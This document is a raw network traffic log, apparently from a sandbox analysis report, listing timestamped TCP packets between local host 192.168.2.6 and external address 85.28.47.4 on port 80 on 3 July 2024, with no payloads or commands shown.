                                                                Jul 3, 2024 08:38:11.768775940 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.768789053 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.768799067 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.768838882 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.768878937 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.769021034 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.769032955 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.769042969 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.769054890 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.769089937 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.769089937 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.769246101 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.769257069 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.769268990 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.769315958 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.769315958 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.769366980 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.769437075 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.769465923 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.769478083 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.769490004 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.769500971 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.769512892 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.769515991 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.769522905 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.769537926 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.769567966 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.773189068 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.773209095 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.773221016 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.773334980 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.773346901 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.773468018 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.773478985 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.773489952 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.773500919 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.773513079 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.773562908 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.773595095 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.773699999 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.773711920 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.773722887 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.773734093 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.773752928 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.773804903 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.773804903 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.773844004 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.773855925 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.773874998 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.773885965 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.773902893 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.773941040 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.773941040 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.774154902 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.774167061 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.774175882 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.774185896 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.774197102 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.774208069 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.774218082 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.774219990 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.774231911 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.774236917 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.774241924 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.774254084 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.774317026 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.774496078 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.774569035 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.777647018 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.777658939 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.777672052 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.777765989 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.777776957 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.777787924 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.777926922 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.777937889 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.777945042 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.777947903 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.777973890 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.777997017 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.778053045 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.778064966 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.778075933 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.778101921 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.778131008 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.778167009 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.778178930 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.778225899 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.778263092 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.778275013 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.778285027 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.778295994 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.778306961 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.778325081 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.778358936 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.778358936 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.778544903 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.778558016 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.778568029 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.778608084 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.778637886 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.778700113 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.778711081 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.778723955 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.778733969 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.778744936 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.778757095 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.778963089 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.778975010 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.779055119 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.779056072 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.779067993 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.779103041 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.779135942 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.779217005 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.779228926 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.779239893 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.779251099 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.779263020 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.779269934 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.779273987 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.779284954 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.779288054 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.779315948 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.779345989 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.779639006 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.779650927 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.779661894 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.779673100 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.779684067 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.779694080 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.779705048 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.779707909 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.779716969 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.779727936 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.779737949 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.779748917 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.779757023 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.779757023 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.779759884 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.779772043 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.779779911 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.779783964 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.779800892 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.780217886 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.780229092 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.780240059 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.780251026 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.780261040 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.780261040 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.780261040 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.780298948 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.780298948 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.852463961 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.852499008 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.852508068 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.852571964 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.852585077 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.852596045 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.852607012 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.852735996 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.852735996 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.852735996 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.852761984 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.852772951 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.852813005 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.855545044 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.855564117 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.855573893 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.855608940 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.855639935 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.855678082 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.855688095 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.855701923 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.855712891 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.855719090 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.855746984 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.855773926 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.855900049 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.855951071 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.855968952 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.855979919 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.855989933 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.856000900 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.856012106 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.856017113 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.856053114 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.856053114 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.856261969 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.856272936 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.856291056 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.856301069 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.856309891 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.856312037 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.856321096 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.856328964 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.856332064 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.856376886 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.856376886 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.856676102 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.856688023 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.856697083 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.856730938 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.856774092 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.860367060 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.860387087 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.860428095 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.860461950 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.860732079 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.860780001 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.860789061 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.860800028 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.860857964 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.860887051 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.860929966 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.861052036 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.861063004 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.861072063 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.861083031 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.861093044 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.861102104 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.861104012 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.861126900 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.861151934 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.861284971 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.861294985 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.861304998 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.861318111 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.861335993 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.861371994 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.861371994 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.861450911 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.861498117 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.861574888 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.861586094 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.861605883 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.861618042 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.861618042 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.861627102 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.861639977 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.861639977 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.861650944 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.861661911 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.861673117 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.861680031 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.861680031 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.861682892 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.861692905 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.861701012 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.861716986 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.861742973 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.864728928 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.864749908 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.864762068 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.864800930 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.864850998 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.864896059 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.864907980 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.864917994 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.864928007 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.864938974 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.864947081 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.864978075 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.865008116 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.865175962 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.865187883 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.865197897 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.865207911 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.865219116 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.865226030 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.865266085 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.865266085 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.865421057 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.865432024 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.865442038 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.865452051 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.865462065 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.865468025 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.865472078 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.865493059 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.865529060 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.865637064 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.865695953 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.865696907 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.865708113 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.865717888 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.865727901 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.865745068 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.865792036 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.865879059 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.865926027 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.865964890 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.865974903 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.865989923 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.865999937 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.866009951 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.866012096 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.866020918 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.866030931 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.866033077 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.866041899 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.866053104 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.866051912 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.866061926 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.866070032 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.866087914 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.866110086 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.866370916 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.866420031 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.866537094 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.866553068 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.866563082 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.866574049 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.866584063 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.866588116 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.866594076 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.866604090 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.866605043 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.866615057 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.866625071 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.866633892 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.866636038 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.866646051 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.866656065 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.866658926 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.866677999 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.866697073 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.867134094 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.867145061 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.867155075 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.867165089 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.867175102 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.867183924 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.867186069 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.867197037 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.867207050 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.867214918 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.867218018 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.867259979 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.867259979 CEST4971080192.168.2.685.28.47.4
